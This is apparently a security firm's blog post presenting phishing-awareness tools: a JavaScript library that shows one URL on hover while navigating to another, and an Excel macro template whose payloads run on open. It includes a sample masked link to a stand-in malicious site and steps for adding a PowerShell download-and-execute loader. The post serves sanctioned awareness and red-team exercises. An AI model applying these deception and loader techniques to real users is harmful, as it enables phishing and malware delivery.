Tartar Sauce for your Phishing Program

Phishing awareness exercises have become a common part of the larger security strategy for many organizations.  Given the frequency at which major security events start with a user clicking a link or opening an attachment, it is reasonable that organizations want to reduce the likelihood of this sort of misstep. A typical exercise is some variant of coming up with a ruse, sending it to an email list of employees, and tracking who clicks the link.

On various occasions over the years, I have been called upon to develop a custom script or payload for the purpose of phishing in either the context of a phishing awareness campaign, or a red team exercise. Recently, a client expressed a need to do more than the typical link-tracking. Their organization felt that the danger that phishing posed to the organization was not being conveyed sufficiently to the users.  Therefore, they were looking for ways to do a bit more, to better emphasize the risks without being overly intrusive. To support their efforts, I agreed to compile and open-source some resources patterned after things I have created in the past. This post will introduce two simple tools: an Excel template for attachment-based phishing, and a JavaScript library for masking malicious links.  The resources discussed in this blog can be found at https://github.com/ProfessionallyEvil/tartar-sauce (this link is not a phish :-).

showgo.js - JavaScript Library for Hiding Malicious Links

Phishing awareness training often promotes hovering over links to determine whether it points somewhere trustworthy. While this generally works in the context of emails (barring a few weaknesses like domain confusion based on punycode domains), it is fundamentally flawed in the context of a web page. The problem is that on a web page, JavaScript can manipulate the link behavior in ways that make hovering show one URL, while navigating through the link goes to a different URL. To simulate this, I developed a JavaScript library that adds support for this misdirecting behavior on <a> tags. This library allows you to specify an alternate URL using a custom attribute, which changes the link's destination when navigated to through various methods.

Key Features

• Custom Attribute for Alternate URLs: The library adds a custom attribute to <a> tags, which specifies an alternate URL. This alternate URL is used when the link is clicked, accessed via the context menu, or copied and pasted.
• Hover Display: On hover, the link displays the original href attribute, making it appear legitimate to the user.

Example Usage

To use the library, follow these steps:

1. Include the Library: Add the JavaScript library to your web page.
2. Configure Links: Modify your <a> tags to include the custom attribute specifying the alternate URL. For example:
   HTML copy code
   <a href="https://legitimate-site.com" data-go-url="https://malicious-site.com">Click here</a>
3. Test the Links: Verify that the alternate URL is used when the link is navigated using different methods. Testing is crucial as browser security features and extensions can affect the behavior of the script.
   

Bootstrap_template.xlsm -

An Excel Template for Attachment-Based Phishing

The problem with web-based phishing pages is that doing anything really impactful would require prerequisites that are not really appropriate for a user-awareness campaign. A truly malicious page would commonly rely on either exploiting unpatched flaws in the browser to attack the user’s machine, or exploiting flaws in other web apps.  While it’s certainly fair to say that application flaws can expose an organization to significant risk when exploited via a malicious phishing campaign, these are not practical to leverage for user awareness exercises.  This is mainly because if you are aware that these flaws are present, the priority should be remediating them. Leaving them in place to use them in a user awareness campaign would also mean leaving them available to any malicious actor, and doing so intentionally is completely irresponsible.  Therefore, if we actually want some sort of benign exploit on the user’s system, attachments are a better option.

To facilitate this, I have developed an Excel file with various relatively benign, baked-in VBA payloads. This template includes a .config sheet for selecting and configuring the VBA payload that will run upon opening the file.  For example, the configuration pictured below uses the NotepadOpen payload, which writes a .txt file containing the specified message to disk and opens it with NotePad.

Key Features

• Easy Configuration of Pre-built VBA Payloads: The template contains a .config worksheet where you can specify different payloads. These payloads can perform actions such as writing a text file to disk and opening it in Notepad, or opening a URL in the browser. You can easily hide the .config worksheet to prevent users from seeing the configuration.

• Customizable Worksheets: You can add additional worksheets to the Excel file to support your specific phishing ruse. These sheets can include convincing content designed to lure users into enabling macros.
  

Example Usage

To use the template, follow these steps:

1. Add Custom Worksheets: Insert worksheets that align with your phishing scenario. These could include fake invoices, HR forms, or any other document type that would entice the target to enable macros.
2. Configure the Payload: On the .config worksheet, select the desired payload. For example, you might configure the BrowserOpen payload to launch a hosted phishing awareness page in the user’s browser.
3. Hide the Configuration Sheet: Once the payload is configured, hide the .config worksheet to prevent users from discovering the setup.
4. Test the Payload: Ensure that the payload functions as expected in your target environment. Testing is crucial as various security controls, such as antivirus software and macro settings, can impact the success of the campaign.

Reminder: Always test the payloads thoroughly in a controlled environment to ensure they function correctly, and understand the potential impact of security controls on the exercise.

Extending the Spreadsheet's Payloads

With a little bit of VBA, it’s not difficult to add or modify the spreadsheet’s payloads. For example, while the open-sourced version does not have my PowershellLoader script, here’s the  process for adding it.

Reminder: This payload downloads and executes a Powershell script, which can absolutely be used for evil. Plenty of malware loaders exist that already do this, so it’s not really anything new from that standpoint. But for the security person running a phishing campaign for the purposes of user awareness, remember that you want your users to speak up if they think they have opened or clicked something they shouldn’t have. If your payload is too intrusive, punitive, or embarrassing to your users, you risk deterring them from reporting future occurrences, which can negatively impact incident response. If you are going to use this, do so responsibly.

Adding the PowershellLoader:

1. Open the bootstrap_template.xlsm in Excel (no need to enable macros).
2. Use Alt+F11 (Option+F11 on a Mac keyboard) to open the VBA Editor.
3. On the Project navigation, right-click Modules and choose Insert - Module from the context menu.
4. You can use the Properties window to change the name from Module1 to something descriptive, like PowershellLoader
5. Add the code.
   

6. On the Project navigation, expand Microsoft Excel Object and open ThisWorkbook
   
7. Add to the case statement, on a payload called PowerShell loader it should execute the DownloadAndExecutePowerShellScript function.
   Notice I used the `Sheets(“.config”).Range(“B2”).Value` pattern to retrieve the URL and Message parameters from the .config sheet. The URL specifies where to download the script from, while the Message (if it’s not empty) shows a pop-up message after the execution has completed.
8. Finally, the Validation needs to be updated on the Payload list for the .config sheet. Expand the range for validation by selecting the Payload cell (B1), opening Validation from the Data menu, and increasing the range of cells included.
   
9. Then add your payload name (corresponding with the Case statement from step 7) to one of the empty cells you added to the range.
10. Done. You can now select your new payload and configure it with the options.

Importance of Testing and Security Controls

It's essential to remember that the effectiveness of these tools can be influenced by various security controls in your target environment. Endpoint protection software, macro settings, browser security features, and where a payload is served from, can all provide technical barriers to executing the macros in your attachment. Therefore, thorough testing on a properly configured desktop that meets organization baselines is critical to ensure that your simulations are realistic and effective.

Conclusion

The ruse, timing, targeting, and delivery of the phish are far more critical than the specifics of the payload. However, by open-sourcing these phishing awareness resources, I hope to provide ready-to-go examples that help organizations better convey the risks associated with phishing.

As always, security is an ongoing effort. Regularly update and refine your phishing campaigns to adapt to new threats and challenges. If you have any questions or need further assistance, feel free to reach out to our team. At the end of the day, we like to help you achieve your goal of becoming more secure, whether that’s through consulting, testing, education, or a combination of the three.